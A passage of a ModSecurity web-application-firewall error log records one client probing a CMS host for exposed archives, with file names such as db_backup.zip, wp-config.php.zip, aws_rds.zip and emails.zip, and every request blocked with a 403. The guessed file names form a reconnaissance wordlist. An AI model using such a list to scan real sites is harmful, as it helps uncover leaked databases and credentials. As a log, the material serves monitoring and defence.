"OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/themes.zip"] [unique_id "aa2sKL8gLDtA4xTIJqD4TgAAABA"] [Sun Mar 08 19:04:40.875258 2026] [:error] [pid 13471:tid 13481] [client 35.189.151.148:44838] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/drupal.zip"] [unique_id "aa2sKL8gLDtA4xTIJqD4TwAAAAY"] [Sun Mar 08 19:04:41.075791 2026] [:error] [pid 13471:tid 13490] [client 35.189.151.148:43140] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/archive_2.zip"] [unique_id "aa2sKb8gLDtA4xTIJqD4UQAAAA8"] [Sun Mar 08 19:04:41.076622 2026] [:error] [pid 13605:tid 13612] [client 35.189.151.148:43062] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/session.zip"] [unique_id "aa2sKTLobmDOvyRcAEhfxAAAAMU"] [Sun Mar 08 19:04:42.270694 2026] [:error] [pid 13471:tid 13499] [client 35.189.151.148:39504] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/icons.zip"] [unique_id "aa2sKr8gLDtA4xTIJqD4VwAAABg"] [Sun Mar 08 19:04:42.277827 2026] [:error] [pid 13471:tid 13487] [client 35.189.151.148:38554] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/db_backup.zip"] [unique_id "aa2sKr8gLDtA4xTIJqD4WAAAAAw"] [Sun Mar 08 19:04:42.517299 2026] [:error] [pid 13471:tid 13494] [client 35.189.151.148:60658] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/applications.zip"] [unique_id "aa2sKr8gLDtA4xTIJqD4WQAAABM"] [Sun Mar 08 19:04:42.520292 2026] [:error] [pid 13471:tid 13492] [client 35.189.151.148:60992] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/yarn.zip"] [unique_id "aa2sKr8gLDtA4xTIJqD4WgAAABE"] [Sun Mar 08 19:04:42.523580 2026] [:error] [pid 13471:tid 13479] [client 35.189.151.148:60348] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/website_backup.zip"] [unique_id "aa2sKr8gLDtA4xTIJqD4WwAAAAQ"] [Sun Mar 08 19:04:42.523581 2026] [:error] [pid 13605:tid 13616] [client 35.189.151.148:60920] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/dashboard.zip"] [unique_id "aa2sKjLobmDOvyRcAEhfygAAAMk"] [Sun Mar 08 19:04:42.525550 2026] [:error] [pid 13605:tid 13611] [client 35.189.151.148:60772] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws_monitoring.zip"] [unique_id "aa2sKjLobmDOvyRcAEhfywAAAMQ"] [Sun Mar 08 19:04:42.526527 2026] [:error] [pid 13605:tid 13622] [client 35.189.151.148:60918] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/final_backup.zip"] [unique_id "aa2sKjLobmDOvyRcAEhfzAAAAM8"] [Sun Mar 08 19:04:42.527569 2026] [:error] [pid 13605:tid 13607] [client 35.189.151.148:60040] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/database_backup.zip"] [unique_id "aa2sKjLobmDOvyRcAEhfzQAAAMA"] [Sun Mar 08 19:04:42.527830 2026] [:error] [pid 13605:tid 13613] [client 35.189.151.148:60530] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/backup/full.zip"] [unique_id "aa2sKjLobmDOvyRcAEhfzgAAAMY"] [Sun Mar 08 19:04:42.528523 2026] [:error] [pid 13605:tid 13618] [client 35.189.151.148:60590] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/release_backup.zip"] [unique_id "aa2sKjLobmDOvyRcAEhfzwAAAMs"] [Sun Mar 08 19:04:42.528812 2026] [:error] [pid 13605:tid 13620] [client 35.189.151.148:60554] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/api-docs.zip"] [unique_id "aa2sKjLobmDOvyRcAEhf0AAAAM0"] [Sun Mar 08 19:04:42.529800 2026] [:error] [pid 13471:tid 13489] [client 35.189.151.148:60118] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/mysql_full.zip"] [unique_id "aa2sKr8gLDtA4xTIJqD4XQAAAA4"] [Sun Mar 08 19:04:42.530710 2026] [:error] [pid 13471:tid 13497] [client 35.189.151.148:60804] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/media.zip"] [unique_id "aa2sKr8gLDtA4xTIJqD4XgAAABY"] [Sun Mar 08 19:04:42.539366 2026] [:error] [pid 13471:tid 13484] [client 35.189.151.148:59866] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/wp-config.php.zip"] [unique_id "aa2sKr8gLDtA4xTIJqD4XwAAAAk"] [Sun Mar 08 19:04:42.735705 2026] [:error] [pid 13471:tid 13482] [client 35.189.151.148:44748] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/administrator.zip"] [unique_id "aa2sKr8gLDtA4xTIJqD4YQAAAAc"] [Sun Mar 08 19:04:42.737525 2026] [:error] [pid 13471:tid 13490] [client 35.189.151.148:43328] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/wp-content.zip"] [unique_id "aa2sKr8gLDtA4xTIJqD4YgAAAA8"] [Sun Mar 08 19:04:42.738357 2026] [:error] [pid 13605:tid 13623] [client 35.189.151.148:39988] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/logs-backup.zip"] [unique_id "aa2sKjLobmDOvyRcAEhf0QAAANA"] [Sun Mar 08 19:04:42.739634 2026] [:error] [pid 13471:tid 13491] [client 35.189.151.148:44176] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/november.zip"] [unique_id "aa2sKr8gLDtA4xTIJqD4YwAAABA"] [Sun Mar 08 19:04:42.739647 2026] [:error] [pid 11078:tid 11110] [client 35.189.151.148:42100] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/incremental.zip"] [unique_id "aa2sKn-dmvIeGeY060kitQAAAcA"] [Sun Mar 08 19:04:42.739732 2026] [:error] [pid 13471:tid 13481] [client 35.189.151.148:41240] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws_archive.zip"] [unique_id "aa2sKr8gLDtA4xTIJqD4ZAAAAAY"] [Sun Mar 08 19:04:42.740588 2026] [:error] [pid 13472:tid 13530] [client 35.189.151.148:43932] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws_rds.zip"] [unique_id "aa2sKl3UyizU6P-l0YL9DAAAAFI"] [Sun Mar 08 19:04:42.741782 2026] [:error] [pid 13472:tid 13502] [client 35.189.151.148:37180] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws_database.zip"] [unique_id "aa2sKl3UyizU6P-l0YL9DQAAAEA"] [Sun Mar 08 19:04:42.741811 2026] [:error] [pid 29564:tid 29591] [client 35.189.151.148:39070] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/static.zip"] [unique_id "aa2sKgemqWLB0zKFm0TYUwAAARM"] [Sun Mar 08 19:04:42.741858 2026] [:error] [pid 27307:tid 27318] [client 35.189.151.148:37914] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/npm.zip"] [unique_id "aa2sKgo1nI2o7tYBWw9SaQAAAUk"] [Sun Mar 08 19:04:42.741925 2026] [:error] [pid 12819:tid 12851] [client 35.189.151.148:43848] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/legacy-system.zip"] [unique_id "aa2sKvNtUJnAKTO-2_-26QAAAkc"] [Sun Mar 08 19:04:42.742667 2026] [:error] [pid 13471:tid 13483] [client 35.189.151.148:39526] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/update.zip"] [unique_id "aa2sKr8gLDtA4xTIJqD4ZQAAAAg"] [Sun Mar 08 19:04:42.742698 2026] [:error] [pid 13605:tid 13614] [client 35.189.151.148:43670] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/pre-update.zip"] [unique_id "aa2sKjLobmDOvyRcAEhf0gAAAMc"] [Sun Mar 08 19:04:42.742721 2026] [:error] [pid 7010:tid 7048] [client 35.189.151.148:39394] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/backups/db.zip"] [unique_id "aa2sKpq2Bzew8vjPgCG-ggAAAYs"] [Sun Mar 08 19:04:42.744088 2026] [:error] [pid 13605:tid 13627] [client 35.189.151.148:41904] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/inbox.zip"] [unique_id "aa2sKjLobmDOvyRcAEhf0wAAANQ"] [Sun Mar 08 19:04:42.744127 2026] [:error] [pid 13472:tid 13541] [client 35.189.151.148:38566] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws-rds-backup.zip"] [unique_id "aa2sKl3UyizU6P-l0YL9DgAAAFc"] [Sun Mar 08 19:04:42.744144 2026] [:error] [pid 7010:tid 7051] [client 35.189.151.148:39460] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/public_html.zip"] [unique_id "aa2sKpq2Bzew8vjPgCG-gwAAAY4"] [Sun Mar 08 19:04:42.744194 2026] [:error] [pid 13471:tid 13486] [client 35.189.151.148:44284] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/mirror.zip"] [unique_id "aa2sKr8gLDtA4xTIJqD4ZgAAAAs"] [Sun Mar 08 19:04:42.744457 2026] [:error] [pid 13471:tid 13488] [client 35.189.151.148:42330] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/control-panel.zip"] [unique_id "aa2sKr8gLDtA4xTIJqD4ZwAAAA0"] [Sun Mar 08 19:04:42.744866 2026] [:error] [pid 13473:tid 13543] [client 35.189.151.148:39264] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/emails.zip"] [unique_id "aa2sKkwwZGElJGd8aN_6LAAAAJA"] [Sun Mar 08 19:04:42.744867 2026] [:error] [pid 13471:tid 13495] [client 35.189.151.148:39096] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/web-archive.zip"] [unique_id "aa2sKr8gLDtA4xTIJqD4aAAAABQ"] [Sun Mar 08 19:04:42.744985 2026] [:error] [pid 12819:tid 12852] [client 35.189.151.148:41786] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws-buckets.zip"] [unique_id "aa2sKvNtUJnAKTO-2_-26gAAAkg"] [Sun Mar 08 19:04:42.746286 2026] [:error] [pid 12902:tid 12943] [client 35.189.151.148:37150] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy 